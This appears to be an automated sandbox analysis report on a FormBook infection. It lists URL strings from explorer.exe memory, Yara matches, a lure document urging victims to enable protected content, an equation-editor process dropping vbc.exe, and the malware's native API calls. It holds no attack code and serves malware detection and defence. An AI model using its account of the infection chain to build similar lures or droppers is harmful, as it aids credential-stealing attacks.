Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000007.00000000.2182495093.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2183037587.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000007.00000000.2182495093.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2181905555.00000000039F4000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000007.00000000.2191880997.000000000861C000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2182495093.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2370639916.0000000000260000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2220114080.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2370580381.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2175872234.00000000036B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2220171178.0000000000350000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2370639916.0000000000260000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2370639916.0000000000260000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2220114080.0000000000190000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2220114080.0000000000190000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2370580381.00000000001A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2370580381.00000000001A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2175872234.00000000036B9000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2175872234.00000000036B9000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2220171178.0000000000350000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2220171178.0000000000350000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: document is protected 16 17 18 19 20 Open the document in If thus document was 21 Mkrosoft Off
Source: Screenshot number: 4 Screenshot OCR: protected documents the yelkyw bar above 24 25 26 27 28 . 29 30 31 32 33 34 35 36 37
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file2[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 6_2_004181B0 NtCreateFile, 6_2_004181B0
Source: C:\Users\Public\vbc.exe Code function: 6_2_00418260 NtReadFile, 6_2_00418260
Source: C:\Users\Public\vbc.exe Code function: 6_2_004182E0 NtClose, 6_2_004182E0
Source: C:\Users\Public\vbc.exe Code function: 6_2_00418390 NtAllocateVirtualMemory, 6_2_00418390
Source: C:\Users\Public\vbc.exe Code function: 6_2_004181AA NtCreateFile, 6_2_004181AA
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041825C NtReadFile, 6_2_0041825C
Source: C:\Users\Public\vbc.exe Code function: 6_2_004182DA NtClose, 6_2_004182DA
Source: C:\Users\Public\vbc.exe Code function: 6_2_008500C4 NtCreateFile,LdrInitializeThunk, 6_2_008500C4
Source: C:\Users\Public\vbc.exe Code function: 6_2_00850048 NtProtectVirtualMemory,LdrInitializeThunk, 6_2_00850048
Source: C:\Users\Public\vbc.exe Code function: 6_2_00850078 NtResumeThread,LdrInitializeThunk, 6_2_00850078
Source: C:\Users\Public\vbc.exe Code function: 6_2_008507AC NtCreateMutant,LdrInitializeThunk, 6_2_008507AC
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084F9F0 NtClose,LdrInitializeThunk, 6_2_0084F9F0
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084F900 NtReadFile,LdrInitializeThunk, 6_2_0084F900
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_0084FAD0
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FAE8 NtQueryInformationProcess,LdrInitializeThunk, 6_2_0084FAE8
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FBB8 NtQueryInformationToken,LdrInitializeThunk, 6_2_0084FBB8
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FB68 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_0084FB68
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FC90 NtUnmapViewOfSection,LdrInitializeThunk, 6_2_0084FC90
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FC60 NtMapViewOfSection,LdrInitializeThunk, 6_2_0084FC60
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FD8C NtDelayExecution,LdrInitializeThunk, 6_2_0084FD8C
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FDC0 NtQuerySystemInformation,LdrInitializeThunk, 6_2_0084FDC0
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FEA0 NtReadVirtualMemory,LdrInitializeThunk, 6_2_0084FEA0
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_0084FED0
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FFB4 NtCreateSection,LdrInitializeThunk, 6_2_0084FFB4
Source: C:\Users\Public\vbc.exe Code function: 6_2_008510D0 NtOpenProcessToken, 6_2_008510D0
Source: C:\Users\Public\vbc.exe Code function: 6_2_00850060 NtQuerySection, 6_2_00850060
Source: C:\Users\Public\vbc.exe Code function: 6_2_008501D4 NtSetValueKey, 6_2_008501D4
Source: C:\Users\Public\vbc.exe Code function: 6_2_0085010C NtOpenDirectoryObject, 6_2_0085010C
Source: C:\Users\Public\vbc.exe Code function: 6_2_00851148 NtOpenThread, 6_2_00851148
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084F8CC NtWaitForSingleObject, 6_2_0084F8CC
Source: C:\Users\Public\vbc.exe Code function: 6_2_00851930 NtSetContextThread, 6_2_00851930
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084F938 NtWriteFile, 6_2_0084F938
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FAB8 NtQueryValueKey, 6_2_0084FAB8
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FA20 NtQueryInformationFile, 6_2_0084FA20
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FA50 NtEnumerateValueKey, 6_2_0084FA50
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FBE8 NtQueryVirtualMemory, 6_2_0084FBE8
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FB50 NtCreateKey, 6_2_0084FB50
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FC30 NtOpenProcess, 6_2_0084FC30
Source: C:\Users\Public\vbc.exe Code function: 6_2_00850C40 NtGetContextThread, 6_2_00850C40
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FC48 NtSetInformationFile, 6_2_0084FC48
Source: C:\Users\Public\vbc.exe Code function: 6_2_00851D80 NtSuspendThread, 6_2_00851D80
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FD5C NtEnumerateKey, 6_2_0084FD5C
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FE24 NtWriteVirtualMemory, 6_2_0084FE24
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FFFC NtCreateProcessEx, 6_2_0084FFFC
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FF34 NtQueueApcThread, 6_2_0084FF34
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_025700C4 NtCreateFile,LdrInitializeThunk, 8_2_025700C4
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_025707AC NtCreateMutant,LdrInitializeThunk, 8_2_025707AC
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0256FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 8_2_0256FAD0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0256FAE8 NtQueryInformationProcess,LdrInitializeThunk, 8_2_0256FAE8
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0256FAB8 NtQueryValueKey,LdrInitializeThunk, 8_2_0256FAB8
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0256FB50 NtCreateKey,LdrInitializeThunk, 8_2_0256FB50
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0256FB68 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_0256FB68
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0256FBB8 NtQueryInformationToken,LdrInitializeThunk, 8_2_0256FBB8
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0256F900 NtReadFile,LdrInitializeThunk, 8_2_0256F900
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0256F9F0 NtClose,LdrInitializeThunk, 8_2_0256F9F0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0256FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 8_2_0256FED0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0256FFB4 NtCreateSection,LdrInitializeThunk, 8_2_0256FFB4
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0256FC60 NtMapViewOfSection,LdrInitializeThunk, 8_2_0256FC60
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0256FDC0 NtQuerySystemInformation,LdrInitializeThunk, 8_2_0256FDC0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0256FD8C NtDelayExecution,LdrInitializeThunk, 8_2_0256FD8C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_02570048 NtProtectVirtualMemory, 8_2_02570048
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_02570078 NtResumeThread, 8_2_02570078
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_02570060 NtQuerySection, 8_2_02570060
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_025710D0 NtOpenProcessToken, 8_2_025710D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_02571148 NtOpenThread, 8_2_02571148
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0257010C NtOpenDirectoryObject, 8_2_0257010C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_025701D4 NtSetValueKey, 8_2_025701D4
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0256FA50 NtEnumerateValueKey, 8_2_0256FA50
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0256FA20 NtQueryInformationFile, 8_2_0256FA20
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0256FBE8 NtQueryVirtualMemory, 8_2_0256FBE8
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0256F8CC NtWaitForSingleObject, 8_2_0256F8CC
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_02571930 NtSetContextThread, 8_2_02571930
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0256F938 NtWriteFile, 8_2_0256F938
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0256FE24 NtWriteVirtualMemory, 8_2_0256FE24
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0256FEA0 NtReadVirtualMemory, 8_2_0256FEA0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0256FF34 NtQueueApcThread, 8_2_0256FF34
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0256FFFC NtCreateProcessEx, 8_2_0256FFFC
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_02570C40 NtGetContextThread, 8_2_02570C40
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0256FC48 NtSetInformationFile, 8_2_0256FC48
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0256FC30 NtOpenProcess, 8_2_0256FC30
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0256FC90 NtUnmapViewOfSection, 8_2_0256FC90
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0256FD5C NtEnumerateKey, 8_2_0256FD5C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_02571D80 NtSuspendThread, 8_2_02571D80
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_000981B0 NtCreateFile, 8_2_000981B0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_00098260 NtReadFile, 8_2_00098260
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_000982E0 NtClose, 8_2_000982E0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_00098390 NtAllocateVirtualMemory, 8_2_00098390
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_000981AA NtCreateFile, 8_2_000981AA
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_0009825C NtReadFile, 8_2_0009825C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_000982DA NtClose, 8_2_000982DA
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_00363670 4_2_00363670
Source: C:\Users\Public\vbc.exe Code function: 4_2_00363AF8 4_2_00363AF8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00363E48 4_2_00363E48
Source: C:\Users\Public\vbc.exe Code function: 4_2_00368750 4_2_00368750
Source: C:\Users\Public\vbc.exe Code function: 4_2_00368740 4_2_00368740
